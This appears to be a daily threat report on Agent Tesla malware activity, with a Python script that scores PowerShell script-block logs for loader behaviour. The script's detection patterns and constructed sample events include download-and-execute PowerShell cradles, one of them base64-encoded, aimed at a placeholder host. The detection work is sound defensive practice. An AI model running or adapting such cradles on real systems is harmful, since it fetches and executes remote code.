Agent Tesla - Daily Threat Report

Thursday, April 30, 2026

Daily Summary

Agent Tesla activity surged to 74 new samples on 2026-04-30, a 26% increase over the 7-day average of 59. This marks a notable escalation after several days of stable volume and suggests a renewed distribution push.

New Samples Detected

PowerShell scripts (.ps1) dominate today’s submissions at 35 samples, accounting for nearly half of all new files. Executables (.exe) follow with 15, JavaScript (.js) with 11, and small counts of .bat, .dll, .vbs, .rar, .cmd, .tar, and .hta files. The heavy reliance on script-based loaders over compiled binaries is consistent with recent trends, as actors favor living-off-the-land techniques to bypass static analysis. No new archive or disk image formats appeared, indicating familiar packaging patterns.

Distribution Methods

The script-heavy file mix points to phishing-driven delivery. PowerShell and JavaScript loaders are commonly embedded in email attachments or hosted on compromised sites behind social engineering lures. The presence of .hta and .vbs files reinforces this assessment, as these are classic vectors for drive-by downloads and macro-enabled document payloads. No bulk changes to campaign infrastructure were detected, suggesting the actors continue to rely on previously tested delivery chains.

Detection Rate

Detection coverage for this batch remains effective but not universal. While major engines flag most of these samples on submission, the reliance on obfuscated PowerShell scripts gives attackers a window of opportunity before signatures are updated. The 74 new IOCs indicate that a portion of these variants may have evaded initial scanning. SOC teams should prioritize behavioral monitoring of PowerShell execution rather than relying solely on file reputation.

C2 Infrastructure

No new C2 servers were observed today, which is unusual for such a volume spike. The lack of fresh infrastructure suggests reused domains or IPs from previous campaigns, possibly with rotated credentials or hosting behind hidden services. Geographic patterns remain unchanged with no concentrated hosting regions identified.

7-Day Trend

Today’s 26% surge above the weekly average breaks a period of moderate activity where daily counts hovered near 55-65 samples. The sustained rise over the past three days signals a fresh campaign wave that may continue into early May.

Security Analysis

A notable shift is the complete absence of new C2 domains despite the sample surge. This indicates attackers are likely reusing old infrastructure or relying on domain generation algorithms that were previously observed. A secondary possibility is a pivot to decentralized C2 via legitimate services such as Telegram or Discord. Defensive teams should monitor outbound connections against known Agent Tesla indicator lists and block script execution from untrusted sources in user paths. Recommendation: enable PowerShell Constrained Language Mode on endpoints and deploy script execution logging that records AMSI bypass attempts.
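The Detection Rate and Security Analysis sections both call for behavioural monitoring of PowerShell execution rather than file reputation. The following is an added example of what such monitoring looks like in practice; it is not code from this report or from the abuse.ch feeds it cites. It triages script-block log entries (the content Windows records as Event ID 4104 once script block logging is enabled) for loader-style indicators, decodes any -EncodedCommand payload so obfuscation does not hide the download cradle, and flags entries whose combined indicator score reaches a threshold. The log line format, host and user names, and the example.invalid URLs are all constructed for the example, not real telemetry.

```python
"""Triage of PowerShell script-block log entries for loader-style behaviour.

Added example for this report; the sample events are constructed, and the
flat "ts 4104 host= user= script=" line format is an assumption standing in
for whatever a SIEM exports from Event ID 4104.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Indicator patterns. Each hit adds one point; a download cradle combined with
# Invoke-Expression, or an encoded command that decodes to one, is the
# behaviour that file-reputation checks alone miss.
INDICATORS: Dict[str, re.Pattern] = {
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "char_assembly": re.compile(r"\[char\]\s*\d+", re.I),
}

LOG_RE = re.compile(r"^(?P<ts>\S+) 4104 host=(?P<host>\S+) user=(?P<user>\S+) script=(?P<script>.*)$")


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; return '' if it is not."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_script_block(text: str) -> Tuple[int, List[str]]:
    """Return (score, indicator names) for one script block.

    The encoded blob is removed from the surface text before matching so that
    base64 noise cannot trigger the other patterns; the decoded plaintext is
    then scanned separately and its hits are prefixed with 'decoded:'.
    """
    m = INDICATORS["encoded_command"].search(text)
    surface, decoded = text, ""
    if m:
        decoded = decode_encoded_command(m.group(1))
        surface = text[:m.start(1)] + text[m.end(1):]
    hits = ["encoded_command"] if m else []
    hits += [n for n, p in INDICATORS.items() if n != "encoded_command" and p.search(surface)]
    hits += ["decoded:" + n for n, p in INDICATORS.items() if n != "encoded_command" and p.search(decoded)]
    return len(hits), hits


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Parse one constructed log line; None for lines that do not fit the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(lines: List[str], threshold: int = 2) -> List[Dict[str, object]]:
    """Return the events whose indicator score meets the threshold."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        score, hits = score_script_block(ev["script"])
        if score >= threshold:
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "score": score, "hits": hits})
    return findings


# Constructed sample: an encoded stage-one cradle as a loader would pass it.
_ENCODED_STAGE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')".encode("utf-16le")
).decode("ascii")

SAMPLE_EVENTS = [
    "2026-04-30T08:01:12Z 4104 host=WS-0142 user=jdoe script=Get-ChildItem C:/Users/jdoe/Documents | Measure-Object",
    "2026-04-30T08:03:45Z 4104 host=WS-0142 user=jdoe script=powershell.exe -nop -w hidden -enc " + _ENCODED_STAGE,
    "2026-04-30T08:04:02Z 4104 host=WS-0077 user=asmith script=$s=(New-Object Net.WebClient).DownloadString('http://example.invalid/a.txt'); Invoke-Expression $s",
    "2026-04-30T08:05:30Z 4104 host=WS-0099 user=admin script=Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser",
    "2026-04-30T08:06:11Z 4104 host=WS-0099 user=admin script=$p=[char]72+[char]105; Write-Output $p",
    "malformed line that the parser skips",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']} score={f['score']} hits={','.join(f['hits'])}")
```

With the default threshold of 2, only the encoded loader and the plaintext cradle are reported; the single weak indicator on the char-assembly line is kept below the threshold so that ordinary admin scripting does not page the SOC, while the decode step means the hidden-window encoded entry scores highest even though its surface text contains no cradle at all.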

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
